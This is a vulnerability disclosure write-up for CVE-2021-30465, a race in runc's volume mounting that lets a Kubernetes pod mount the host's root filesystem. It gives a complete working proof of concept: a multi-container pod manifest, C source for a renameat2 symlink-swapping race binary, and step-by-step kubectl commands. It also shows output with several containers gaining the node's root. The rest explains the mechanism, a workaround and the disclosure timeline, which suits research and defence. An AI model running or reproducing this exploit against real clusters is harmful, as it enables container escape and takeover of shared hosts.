runc mount destinations can be swapped via symlink-exchange to cause mounts outside the rootfs (CVE-2021-30465)
It’s November 2020 and I’m troubleshooting a container running on K8S that is doing tons of writes to the local disk.
As those writes are just temporary states, I quickly add an emptyDir tmpfs
volume at /var/run
,
open a ticket so that my devs make it permanent, and call it a day.
Some time later I notice, looking at mount
output, that this new tmpfs
is mounted at /run
instead of /var/run
,
which I missed earlier but surprises me a bit. /var/run
is a symlink to ../run
and
after a quick test this is actually the normal Linux behavior to have mount follow symlinks,
so I start wondering how does containerd/runc make sure the mounts are inside the container rootfs.
After following the code responsible for the mounts, I end up reading the comment of securejoin.SecureJoinVFS()
:
// Note that the guarantees provided by this function only apply if the path
// components in the returned string are not modified (in other words are not
// replaced with symlinks on the filesystem) after this function has returned.
// Such a symlink race is necessarily out-of-scope of SecureJoin.
As you read this you know that this race condition exists, the question is how to exploit it to escape to the K8S host.
POC
When mounting a volume, runc trusts the source, and will let the kernel follow symlinks, but it doesn’t trust the target argument and will use ‘filepath-securejoin’ library to resolve any symlink and ensure the resolved target stays inside the container root. As explained in SecureJoinVFS() documentation, using this function is only safe if you know that the checked file is not going to be replaced by a symlink, the problem is that we can replace it by a symlink. In K8S there is a trivial way to control the target, create a pod with multiple containers sharing some volumes, one with a correct image, and the other ones with non existing images so they don’t start right away.
Let’s start with the POC first and the explanations after
-
Create our attack POD
kubectl create -f - <<EOF apiVersion: v1 kind: Pod metadata: name: attack spec: terminationGracePeriodSeconds: 1 containers: - name: c1 image: ubuntu:latest command: [ "/bin/sleep", "inf" ] env: - name: MY_POD_UID valueFrom: fieldRef: fieldPath: metadata.uid volumeMounts: - name: test1 mountPath: /test1 - name: test2 mountPath: /test2 $(for c in {2..20}; do cat <<EOC - name: c$c image: donotexists.com/do/not:exist command: [ "/bin/sleep", "inf" ] volumeMounts: - name: test1 mountPath: /test1 $(for m in {1..4}; do cat <<EOM - name: test2 mountPath: /test1/mnt$m EOM done ) - name: test2 mountPath: /test1/zzz EOC done ) volumes: - name: test1 emptyDir: medium: "Memory" - name: test2 emptyDir: medium: "Memory" EOF
-
Compile race.c (simple binary running renameat2(dir,symlink,RENAME_EXCHANGE))
cat > race.c <<'EOF' #define _GNU_SOURCE #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> #include <sys/syscall.h> int main(int argc, char *argv[]) { if (argc != 4) { fprintf(stderr, "Usage: %s name1 name2 linkdest\n", argv[0]); exit(EXIT_FAILURE); } char *name1 = argv[1]; char *name2 = argv[2]; char *linkdest = argv[3]; int dirfd = open(".", O_DIRECTORY|O_CLOEXEC); if (dirfd < 0) { perror("Error open CWD"); exit(EXIT_FAILURE); } if (mkdir(name1, 0755) < 0) { perror("mkdir failed"); //do not exit } if (symlink(linkdest, name2) < 0) { perror("symlink failed"); //do not exit } while (1) { renameat2(dirfd, name1, dirfd, name2, RENAME_EXCHANGE); } } EOF gcc race.c -O3 -o race
-
Wait for the container c1 to start, upload the ‘race’ binary to it, and exec bash
sleep 30 # wait for the first container to start kubectl cp race -c c1 attack:/test1/ kubectl exec -ti pod/attack -c c1 -- bash
you now have a shell in container c1
-
Create the following symlink (explanations later)
ln -s / /test2/test2
-
Launch ‘race’ multiple times to try to exploit this TOCTOU
cd test1 seq 1 4 | xargs -n1 -P4 -I{} ./race mnt{} mnt-tmp{} /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
-
Now that everything is ready, in a second shell, update the images so that the other containers can start
for c in {2..20}; do kubectl set image pod attack c$c=ubuntu:latest done
-
Wait a bit and look at the results
for c in {2..20}; do echo ~~ Container c$c ~~ kubectl exec -ti pod/attack -c c$c -- ls /test1/zzz done
~~ Container c2 ~~ test2 ~~ Container c3 ~~ test2 ~~ Container c4 ~~ test2 ~~ Container c5 ~~ bin dev home lib64 mnt postinst root sbin tmp var boot etc lib lost+found opt proc run sys usr ~~ Container c6 ~~ bin dev home lib64 mnt postinst root sbin tmp var boot etc lib lost+found opt proc run sys usr ~~ Container c7 ~~ error: unable to upgrade connection: container not found ("c7") ~~ Container c8 ~~ test2 ~~ Container c9 ~~ bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var ~~ Container c10 ~~ test2 ~~ Container c11 ~~ bin dev home lib64 mnt postinst root sbin tmp var boot etc lib lost+found opt proc run sys usr ~~ Container c12 ~~ test2 ~~ Container c13 ~~ test2 ~~ Container c14 ~~ test2 ~~ Container c15 ~~ bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var ~~ Container c16 ~~ error: unable to upgrade connection: container not found ("c16") ~~ Container c17 ~~ error: unable to upgrade connection: container not found ("c17") ~~ Container c18 ~~ bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var ~~ Container c19 ~~ error: unable to upgrade connection: container not found ("c19") ~~ Container c20 ~~ test2
On my first try running this POC, I had 6 containers where /test1/zzz was / on the node, some failed to start, and the remaining were not affected.
Even without the ability to update images, we could use a fast registry for c1 and a slow registry or big container for c2+, we just need c1 to start 1sec before the others.
Tests were done on the following GKE cluster:
gcloud beta container --project "delta-array-282919" clusters create "toctou" --zone "us-central1-c" --no-enable-basic-auth --cluster-version "1.18.12-gke.1200" --release-channel "rapid" --machine-type "e2-medium" --image-type "COS_CONTAINERD" --disk-type "pd-standard" --disk-size "100" --metadata disable-legacy-endpoints=true --scopes "https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" --num-nodes "3" --enable-stackdriver-kubernetes --enable-ip-alias --network "projects/delta-array-282919/global/networks/default" --subnetwork "projects/delta-array-282919/regions/us-central1/subnetworks/default" --default-max-pods-per-node "110" --no-enable-master-authorized-networks --addons HorizontalPodAutoscaling,HttpLoadBalancing --enable-autoupgrade --enable-autorepair --max-surge-upgrade 1 --max-unavailable-upgrade 0 --enable-shielded-nodes
K8S 1.18.12, containerd 1.4.1, runc 1.0.0-rc10, 2 vCPUs
Explanations
I haven’t dug too deep in the code and relied on strace to understand what was happening, and did the investigation about a month before finally having a working POC, so details are fuzzy, but here is my understanding:
-
K8S prepares all the volumes for the pod in
/var/lib/kubelet/pods/$MY_POD_UID/volumes/VOLUME-TYPE/VOLUME-NAME
(In my POC I’m using the fact that the path is known, but looking at/proc/self/mountinfo
leaks all you need to find the path) -
containerd prepares the rootfs at
/run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs
-
runc calls
unshare(CLONE_NEWNS)
and sets the mount propagation toMS_SLAVE
, thus preventing the following mount operations to affect other containers or the node directly -
runc mount bind the K8S volumes
-
runc call
securejoin.SecureJoin()
to resolve the destination/target -
runc call
mount()
-
K8S doesn’t give us control over the mount source, but we have full control over the target of the mount, so the trick is to mount a directory containing a symlink over K8S volumes path to have the next mount use this new source, and give us access to the node root filesystem.
From the node the filesystem look like this
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt1
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp1 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt2 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp2
...
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2/test2 -> /
Our race
binary is constantly swapping mntX
and mnt-tmpX
, when c2+ start, they do the following mounts
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/mntX)
which is equivalent to
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mntX)
as the volume is bind mounted into the container rootfs
If we are lucky, when we call SecureJoin()
, mntX
is a directory, and when we call mount()
mntX
is now a symlink, and as mount()
follow symlinks, this gives us
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/)
The filesystem now looks like
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2 -> /
When we do the final mount
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)
resolves to
mount(/, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)
And we now have full access to the whole node root, including /dev, /proc, all the tmpfs and overlay of other containers, everything :)
Workaround
A possible workaround is to forbid mounting volumes in volumes, but as usual upgrading is recommended.
Comments
This POC is far from being optimal and, as already stated, being able to update the image is not mandatory.
It took me some tries to have a working POC, at first I was trying to just mount the tmpfs
volume to impact the host (/root/.ssh
),
but this doesn’t work as the mounts are happening in a new mount namespace (and with the right mount propagation set), so the mounts are not visible in the host mount namespace.
I then tried using a golang version for the race binary, 4 containers and 20 volumes, and this was always failing. I then switched to a C version (not sure it makes a difference), 19 containers and 4 mounts and this worked and gave me 6 containers out of 19 with the host mounted.
Even with newer syscalls like openat2()
you still need to mount(/proc/self/fd/X, /proc/self/fd/Y)
to be race free, not sure how useful having a new mount flag to fail when one of the params is a symlink would be, but this is a huge footgun.
This vulnerability exists because having untrusted/restricted container definitions was not part of the initial threat model of Docker/runc and was added later by K8S. You can sometimes read that K8S is multi-tenant, but you have to understand it as multiple trusted teams, not as giving API access to strangers.
On February 24th Google introduced GKE Autopilot, fully managed K8S Clusters with an emphasis on security and theoretically no access to the node, so after testing I also reported to them.
Timeline
- 2020-11-??: Discover
SecureJoinVFS()
comment - 2020-12-26: Initial report to security@opencontainers.org (Merry Christmas :) )
- 2020-12-27: Report acknowledgment
- 2021-03-06: Report to Google for their new GKE Autopilot
- 2021-04-07: Got added to discussions around the fix
- 2021-04-08: Google bounty :) (to be donated to Handicap International)
- 2021-05-19: End of embargo, advisory published on GitHub and on OSS-Security
- 2021-05-30: Write-up + POC public
Acknowledgments
Thanks to Aleksa Sarai (runc maintainer) for his fast responses and all his work, to Noah Meyerhans and Samuel Karp for their help fixing and testing, and to Google for the bounty.